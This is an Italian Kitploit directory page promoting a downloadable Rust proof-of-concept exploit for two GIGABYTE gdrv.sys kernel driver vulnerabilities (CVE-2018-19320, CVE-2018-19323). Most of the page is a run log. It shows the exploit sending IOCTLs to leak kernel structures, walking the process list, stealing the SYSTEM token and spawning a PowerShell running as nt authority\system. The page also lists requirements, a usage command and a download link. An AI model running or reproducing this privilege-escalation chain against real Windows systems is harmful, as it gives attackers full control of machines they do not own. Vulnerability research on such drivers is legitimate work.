Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-1932X — POC in Rust per vulnerabilità dei driver kernel CVE-2018-1932X | Kitploit
Strumenti/GitHubGitHub/bkreisel/cve-2018-1932x
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPost-ExploitSviluppo PayloadBinary Exploitation
GitHubbkreisel/cve-2018-1932x

CVE-2018-1932X

POC in Rust per vulnerabilità dei driver kernel CVE-2018-1932X

Vedi Repository
33 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2018-1932X (Rust Exploit POC) per GIGABYTE APP Center v1.05.21 e precedenti

Solo perché il tuo target non è memory safe non significa che il tuo exploit debba esserlo!

Vulnerabilità utilizzate:

  • CVE-2018-19320 - funzionalità ring0 simile a memcpy
  • CVE-2018-19323 - lettura e scrittura dei Machine Specific Registers (MSR).

Testato su:

  • 20H1: Windows 10 Kernel Version 19041 MP (1 procs) Free x64

Riferimenti

  • Progetto Vergilius: Strutture del Kernel
  • Annuncio Patch Gigabyte
  • Dettagli _KPCR

Requisiti

  • Solo x64
  • Build # testate sopra
  • Driver GIGABYTE caricato: gdrv.sys

Utilizzo

.\CVE-2018-1932X.exe

Esempio

root@kitploit:~
PS Z:\CVE-2018-1932X\target\debug> .\CVE-2018-1932X.exe
CVE-2019-1932X

Apertura handle al driver del kernel: \\.\GIO
Handle acquisito: 0xa8
Invio IOCTL: 0xc3502580 con 0x10 byte di dati
  [+] Leaked   _KPCR: ffffe48159d88000
  [*] Address  _KPCRB: ffffe48159d88020
Invio IOCTL: 0xc3502808 con 0x14 byte di dati
  [+] Leaked   _KPRCB: ffffe48159d88180
  [*] Address  _KTHREAD: ffffe48159d88188
Invio IOCTL: 0xc3502808 con 0x14 byte di dati
  [+] Leaked   _KTHREAD: ffffb50b14d16080
  [*] Address  _KPROCESS: ffffb50b14d162a0
Invio IOCTL: 0xc3502808 con 0x14 byte di dati
  [+] Leaked   _KPROCESS: ffffb50b1507f080
  [*] Address  PID: ffffb50b1507f4c0
Invio IOCTL: 0xc3502808 con 0x14 byte di dati
  [+] Leaked   PID: 2092
  [+] Known    PID: 2092
Percorso concatenamento Active Process Links...
  [*] Address  ActiveProcessLinks.Flink: ffffb50b1507f4c8 (PID: 82c)
Invio IOCTL: 0xc3502808 con 0x14 byte di dati
Invio IOCTL: 0xc3502808 con 0x14 byte di dati
  [+] Leaked   _EPROCESS: fffff8015561e060 (PID: 0)
  [*] Address  ActiveProcessLinks.Flink: fffff8015561e060 (PID: 0)
Invio IOCTL: 0xc3502808 con 0x14 byte di dati
Invio IOCTL: 0xc3502808 con 0x14 byte di dati
  [+] Leaked   _EPROCESS: ffffb50b100624c8 (PID: 4)
Invio IOCTL: 0xc3502808 con 0x14 byte di dati
Invio IOCTL: 0xc3502808 con 0x14 byte di dati
  [+] Current Token: ffff9708cac8306e
  [+] System  Token: ffff9708c567b047
Prestito token SYSTEM...
Invio IOCTL: 0xc3502808 con 0x14 byte di dati
Invio IOCTL: 0xc3502808 con 0x14 byte di dati
  [+] Current Token: ffff9708c567b047
Generazione processo...
  [+] Generato processo SYSTEM
Chiusura handle al driver del kernel: \\.\GIO

Powershell generata:

root@kitploit:~
PS C:\> whoami
nt authority\system

Blocchi Vulnerabili

Memcpy (IOCTL 0x0C3502808)

Blocchi di codice Memcpy

Manipolazione MSR (IOCTL 0x0C3502580)

Blocchi di codice MSR

Scarica lo strumento